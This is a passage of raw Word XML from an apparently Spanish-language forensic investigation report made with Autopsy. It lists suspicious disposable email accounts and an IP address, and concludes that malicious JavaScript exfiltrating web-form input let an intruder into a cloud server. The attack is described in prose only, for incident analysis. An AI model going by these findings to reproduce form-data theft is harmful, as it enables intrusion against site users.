aAAAAAElFTkSuQmCCUEsDBBQABgAIAAAAIQCPPrkv&#10;4QAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcFbu0ljSojZlFLUUxFsBfG2&#10;zU6T0OxsyG6T9N87nvQ4vI833ys2s+3EiINvHSmIlxEIpMqZlmoFn8fXRQbCB01Gd45QwQ09bMr7&#10;u0Lnxk30geMh1IJLyOdaQRNCn0vpqwat9kvXI3F2doPVgc+hlmbQE5fbTq6iaC2tbok/NLrHXYPV&#10;5XC1Ct4mPW2T+GXcX8672/cxff/ax6jU48O8fQYRcA5/MPzqszqU7HRyVzJedAoW6dOaUQ6SZAWC&#10;iSyNeMxJQRKnGciykP83l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9VMwmYIDAAAjCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAK&#10;AAAAAAAAACEAY2IS66NCAACjQgAAFAAAAAAAAAAAAAAAAADoBQAAZHJzL21lZGlhL2ltYWdlMS5w&#10;bmdQSwECLQAUAAYACAAAACEAjz65L+EAAAALAQAADwAAAAAAAAAAAAAAAAC9SAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAAy0kAAGRycy9f&#10;cmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAvkoAAAAA&#10;">
                <v:shape id="Imagen 108" o:spid="_x0000_s1238" type="#_x0000_t75" style="position:absolute;width:32346;height:1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oNczAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsbvW2Dax21LEQumlWKXn1+xrEsy+jdltEv31rlDwOMzMN8x8OdhadNT6yrGGh5EC&#10;QZw7U3Gh4eN9fT8D4QOywdoxafgmD8vF9dUcM+N6fqNuHwoRIewz1FCG0GRS+rwki37kGuLonVxr&#10;MUTZFtK02Ee4reVYqYm0WHFcKLGhl5Lyz/3Zapiks/7uvLar4zTdfb3+MB66fqv17c2wegYRaAj/&#10;4Ut7YzQ8jtVTopI0gb9L8Q7IxS8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAanqDXMwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                  <v:imagedata r:id="rId255" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1239" type="#_x0000_t202" style="position:absolute;left:33491;top:1807;width:24003;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0+GzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsRvT0NbYbSlFQXspxl56e2Rfs9Hs27C7aeO/dwXB4zAz3zDL9Wg7cSYfWscKHiYZ&#10;COLa6ZYbBYePl/sFiBCRNXaOScE3BVivrq+WWGp34Xc6V7ERCcKhRAUmxr6UMtSGLIaJ64mTd3Le&#10;YkzSN1J7vCS47WSeZTNpseW0YLCnraH6qxqsgn1x3Ju74fS82xRT/3YYtrPPplLq9mbcPIGINMb/&#10;8F/7VSuYz4tsWuSPOfxeSndArn4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEANe9PhswA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1D500835" w14:textId="011F72CA" w:rsidR="00CF5038" w:rsidRPr="00077232" w:rsidRDefault="00CF5038" w:rsidP="00CF5038">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>62</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="154" w:name="_Toc155782629"/>
                        <w:r w:rsidRPr="009706DC">
                          <w:t>Extracto de cuentas de correo parecidas o similares a las de anatoly5676.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="154"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000066BC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Haciendo investigación gracias a Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</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0066BC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, se detectan dentro del sistema</w:t>
      </w:r>
      <w:r w:rsidR="00390CD7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> las </w:t>
      </w:r>
      <w:r w:rsidR="00847544">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>siguientes cuentas de correo sospechosas:</w:t>
      </w:r>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId256" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>pafzzj0anatoly12312anatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId257" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>bs.jckcy3j43batzml8vbw25u1y5zm1anatoly5676anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId258" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>hpxecjqa@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId259" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>bwlddhjadekqa7qcrz3rsasoqxufzp1anatoly5676anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatoly5676@grr.la</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId261" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId262" w:history="1">
        <w:r w:rsidR="007B212C" w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>fanatoly12312@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B212C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A781D" w14:textId="3DCEDE8B" w:rsidR="00847544" w:rsidRDefault="00E841F1" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Es muy casual que la cuenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId263" w:history="1">
        <w:r w:rsidRPr="00717BAF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>test12312321@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, sea también del dominio mailinator.com. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C58115C" w14:textId="014369A6" w:rsidR="00F43836" w:rsidRDefault="00144AF3" w:rsidP="00F43836">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusiones</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B848580" w14:textId="0F1CA90A" w:rsidR="00A703AB" w:rsidRPr="00E841F1" w:rsidRDefault="00A703AB" w:rsidP="00F43836">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hemos hallado la manera en el que se ha infectado el cloud server. Esta conexión a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>18.195.165.56</w:t>
      </w:r>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, posiblemente </w:t>
      </w:r>
      <w:r w:rsidR="000066BC" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esté intervenida por un man in the middle</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Man in the middle: Tipo de ataque donde un atacante intercepta la comunicación entre dos partes sin que ellas lo sepan.</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0066BC" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o similar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. De </w:t>
      </w:r>
      <w:r w:rsidR="009940A1" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hecho,</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un </w:t>
      </w:r>
      <w:r w:rsidR="009940A1" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>plausible</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009940A1" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> debido a</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E841F1" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro del </w:t>
      </w:r>
      <w:r w:rsidR="00471581" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>último de los</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mails, mande el código con un </w:t>
      </w:r>
      <w:r w:rsidR="0084399F" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009940A1" w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>malicioso</w:t>
      </w:r>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. el cual remite toda la información que se inserta en la web, por tanto, posiblemente, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>anatoly5676</w:t>
      </w:r>
      <w:r w:rsidRPr="00E841F1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha estado entrando por donde ha querido dentro del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7D7FE" w14:textId="1BCE0C3D" w:rsidR="00C4245F" w:rsidRDefault="00C4245F" w:rsidP="00B01996">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251896832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73CAA741" wp14:editId="07553136">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>403984</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>487045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4837895" cy="1255594"/>
                <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="823206497" name="Grupo 57"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4837895" cy="1255594"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5306067" cy="1753235"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="29676008" name="Imagen 109"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>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605405" cy="1753235"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="650950352" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2700662" y="489097"/>
                            <a:ext cx="2605405" cy="612301"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6DFCC31D" w14:textId="5AA6E8DE" w:rsidR="00F674A8" w:rsidRPr="00F11175" w:rsidRDefault="00F674A8" w:rsidP="00F674A8">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>63</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="155" w:name="_Toc155782630"/>
                              <w:r w:rsidRPr="00BF6506">
                                <w:t xml:space="preserve">Herramienta línea del Tiempo de </w:t>
                              </w:r>
                              <w:r>
                                <w:t>A</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF6506">
                                <w:t>utopsy.</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3CAA741" id="Grupo 57" o:spid="_x0000_s1240" style="position:absolute;left:0;text-align:left;margin-left:31.8pt;margin-top:38.35pt;width:380.95pt;height:98.85pt;z-index:251896832" coordsize="53060,17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